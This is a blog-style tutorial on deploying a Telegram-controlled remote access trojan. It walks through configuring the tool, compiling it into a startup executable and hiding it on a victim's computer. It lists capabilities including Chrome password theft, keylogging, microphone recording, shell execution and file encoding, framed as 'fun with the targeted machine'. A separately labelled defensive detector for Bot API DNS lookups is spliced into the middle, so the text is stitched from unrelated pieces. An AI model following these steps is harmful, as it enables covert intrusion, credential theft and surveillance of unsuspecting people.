In this new era of bots, almost everywhere you go on the internet, the web applications you talk to and put your queries to are operated by bots. A bot is something that carries out your commands on your behalf. Many companies now use bots to provide online chat support to their customers: you say “hi” on chat support and you get “hello, how may I help you” in reply. This is a great revolution for companies and organizations, and it helps them a lot in automatically resolving their clients’ issues. But what about hackers? Don’t they take advantage of bots for their own selfish use? This article shows how Telegram can be used to hack into a computer and control it as a bot.
There are many Remote Administration Tools (RATs) available in the market, but they commonly pose two problems:
- The first problem is that if you take control of a computer hundreds of miles away through some trojan or malware, then in order to have some fun with that machine or to control it, you have to configure a Command and Control (C&C) server so that the C&C server gives the required commands to the victim machine.
- The second problem is that the communication between the victim machine and the C&C server is not encrypted, which makes the communication insecure.
To overcome these problems, some researchers use Telegram bots as a Remote Administration Tool, which addresses the two problems as follows:
- To control the victim’s computer, you don’t need to do any port forwarding or host any server, as Telegram bots take care of this. The Telegram Bot API connects the victim’s computer to the Telegram server, through which the attacker can easily communicate with the victim.
- The whole communication is encrypted through the HTTPS protocol, which helps to prevent any man-in-the-middle attack.
- Best of all, the attacker can use Telegram on his/her mobile phone to control the victim machine or bot.
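Seen from the defender's side, the channel described above appears as an endpoint process resolving and connecting to the Bot API host api.telegram.org; because the traffic is HTTPS, the hostname and the owning process are what is visible without TLS inspection. The following is an added example, not code from the original article or from the tool: it triages Sysmon-style DNS query events (Event ID 22) for non-allowlisted processes that look up that host. The sample events, host names, file paths and the allowlisted notifier.exe are constructed or hypothetical.

```python
import json
from collections import defaultdict
from datetime import datetime

BOT_API_HOST = "api.telegram.org"  # hostname used by the Telegram Bot API
# Assumption: sanctioned software allowed to use the Bot API (hypothetical path).
ALLOWED_IMAGES = {r"c:\program files\opsnotifier\notifier.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\desktop\\", "\\downloads\\")
INTERPRETERS = ("\\python.exe", "\\pythonw.exe")
FIELDS = ("UtcTime", "Computer", "Image", "QueryName")

# Constructed sample: Sysmon-style DNS query events (Event ID 22) as JSON lines.
SAMPLE_EVENTS = r"""
{"UtcTime": "2020-04-20 10:00:01.120", "Computer": "WS-014", "Image": "C:\\Users\\alice\\Desktop\\dist\\updater.exe", "QueryName": "api.telegram.org"}
{"UtcTime": "2020-04-20 10:00:05.300", "Computer": "WS-014", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "QueryName": "www.example.com"}
{"UtcTime": "2020-04-20 10:05:02.410", "Computer": "WS-014", "Image": "C:\\Users\\alice\\Desktop\\dist\\updater.exe", "QueryName": "api.telegram.org"}
{"UtcTime": "2020-04-20 10:06:00.000", "Computer": "SRV-02", "Image": "C:\\Program Files\\OpsNotifier\\notifier.exe", "QueryName": "api.telegram.org"}
this line is truncated and not valid JSON
{"UtcTime": "2020-04-20 10:10:03.007", "Computer": "WS-014", "Image": "C:\\Users\\alice\\Desktop\\dist\\updater.exe", "QueryName": "api.telegram.org"}
{"UtcTime": "2020-04-20 11:30:44.900", "Computer": "WS-022", "Image": "C:\\Users\\bob\\AppData\\Local\\Programs\\Python\\Python37\\python.exe", "QueryName": "API.Telegram.org."}
"""


def parse_events(text):
    """Parse JSON-lines events, skipping malformed or incomplete records."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(record, dict) and all(k in record for k in FIELDS):
            events.append(record)
    return events


def is_bot_api_query(name):
    """Match the Bot API host regardless of case or a trailing root dot."""
    return name.rstrip(".").lower() == BOT_API_HOST


def find_bot_api_clients(events):
    """Group Bot API lookups by (host, process image) and attach triage reasons."""
    groups = defaultdict(list)
    for ev in events:
        image = ev["Image"].lower()
        if not is_bot_api_query(ev["QueryName"]) or image in ALLOWED_IMAGES:
            continue
        seen = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        groups[(ev["Computer"], image)].append(seen)

    findings = []
    for (host, image), times in sorted(groups.items()):
        reasons = ["non-allowlisted process resolving " + BOT_API_HOST]
        if any(marker in image for marker in USER_WRITABLE):
            reasons.append("image in user-writable path")
        if image.endswith(INTERPRETERS):
            reasons.append("script interpreter")
        if len(times) >= 3:
            reasons.append("repeated lookups (%d)" % len(times))
        findings.append({
            "host": host,
            "image": image,
            "count": len(times),
            "first_seen": min(times).isoformat(sep=" "),
            "last_seen": max(times).isoformat(sep=" "),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in find_bot_api_clients(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(finding, indent=2))
```
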
So let’s dive into the tool and see how it works:
ENVIRONMENT SETTINGS:
- We strictly recommend Python 3.7. Versions above and below 3.7 are not supported.
- OS: Windows 7, 8 and 10 (Windows 10 recommended). No other operating system is supported.
- Only the 64-bit Windows architecture is supported.
- Make sure you have a good internet connection.
INSTALLATION STEPS:
CREATE YOUR OWN TELEGRAM BOT
- To create the Telegram bot, download the official Telegram app from the Google Play store.
- After downloading, navigate to the search bar of the Telegram app and type BotFather.
- After the BotFather window opens, click start and type /newbot.
- It will then ask you to choose a name for your bot. For instance, let us take the name test123.
- It will now ask you to choose a username for your bot; here we will choose the username rsu890_bot.
- After you perform all the above steps, it will allot you a token ID, which looks something like 'xx:xx'. Copy this token ID and save it in a protected place, as we will be using it to configure the bot.
INSTALLATION AND USAGE OF THE TOOL
- Clone the GitHub repository https://github.com/mvrozanti/RAT-via-Telegram.git
- Unzip the downloaded folder and open RATAttack.py from that folder with Notepad.
- Now press Ctrl+F and search downwards for 'token'.
- Now paste the token ID of your bot where your search takes you first, i.e. change token = 'xx:xx' to token = 'YOUR_TOKEN_ID'.
- Press Find Next and replace 'RVT_TOKEN' with 'YOUR_TOKEN_ID', i.e. change token = os.environ['RVT_TOKEN'] to token = os.environ['YOUR_TOKEN_ID'], and save the file.
- Now download the two Python libraries PyAudio and PyHook from the link given below:
https://www.lfd.uci.edu/~gohlke/pythonlibs/
- Download pyHook-1.5.1-cp37-cp37m-win_amd64.whl and pyHook-1.5.1-cp37-cp37m-win_amd64.whl.
- After downloading the above two libraries, install them by opening the command prompt and typing the commands pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl and pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl.
- After installing the above two libraries, copy the path of the downloaded repository, open the command prompt and type cd <path_of_repository>.
- Now type the command pip install -r requirements.txt.
- Now your tool is ready to go; you can use it by typing the command python RATAttack.py.
- Now open the Telegram app on your mobile phone, search for your bot's username (for example rsu890_bot) and type the command /help in the chat box.
It will show you the following commands:
- arp - display arp table
- capture_pc - screenshot PC
- cmd_exec - execute shell command
- cp - copy files
- cd - change current directory
- delete - delete a file/folder
- download - download file from target
- decode_all - decode ALL encoded local files
- dns - display DNS Cache
- encode_all - encode ALL local files
- freeze_keyboard - enable keyboard freeze
- unfreeze_keyboard - disable keyboard freeze
- get_chrome - Get Google Chrome's login/passwords
- hear - record microphone
- ip_info - via ipinfo.io
- keylogs - get keylogs
- ls - list contents of current or specified directory
- msg_box - display message box with text
- mv - move files
- pc_info - PC information
- ping - makes sure target is up
- play - plays a youtube video
- proxy - opens a proxy server
- pwd - show current directory
- python_exec - interpret python
- reboot - reboot computer
- run - run a file
- schedule - schedule a command to run at specific time
- self_destruct - destroy all traces
- shutdown - shutdown computer
- tasklist - display services and processes running
- to - select targets by it's name
- update - update executable
- wallpaper - change wallpaper
NOW LET’S HAVE SOME FUN WITH THE TARGETED MACHINE:
- Search for your bot in the Telegram app and type /pc_info to get information about the victim’s machine.
- You can see and alter the Windows files of the victim’s system by typing the command /cd C:\Windows\system32
- You can see the DNS records of the victim’s machine by typing /dns.
- If you want the target machine to communicate with you only, replace the CHAT_ID in RATAttack.py as:
- Similarly, you can play a YouTube video by giving the command /play <VIDEO_ID>
- You can shut down or restart the victim’s computer with /shutdown or /restart respectively.
You can do many more tasks by reading the /help manual!
USING THE TOOL AS A TROJAN:
Yes, we can use this tool as a trojan. As we all know, the easiest path to deliver malware to someone’s computer is to pack the malware into an .exe and send it to the victim. Here we will do the same thing by creating an .exe which will always run at startup. To make the .exe file, follow these steps:
- Open compile.py in the downloaded folder with Notepad.
- Comment out the statements download_and_install_lfd_uci_wheel('pyAudio') and download_and_install_lfd_uci_wheel('pyHook'), changing them to #download_and_install_lfd_uci_wheel('pyAudio') and #download_and_install_lfd_uci_wheel('pyHook') respectively, and save the file.
- Now open the terminal again and move to the RATAttack folder by typing the command cd <path_of_RATAttack>.
- Now run the command python compile.py to build the .exe file.
- Once the compilation is successful, your .exe file is built; you can find it in \dist and run it in the same way as you ran the tool in the steps above.
- If you have access to the victim’s computer for a while, you can hide this .exe file and keep it running in the background, or you can bind this .exe file and do some scripting to hide it on the victim’s computer.
CONCLUSION:
The whole tool is written in Python, which provides many of the functions in the tool. The concept behind this tool is much better than that of other malware attacks, and it helps the attacker to easily communicate with the victim’s system with less technical knowledge required.
RSU is a security researcher who is constantly working to make the world a secure place to live. He is working day and night in the cyber security area.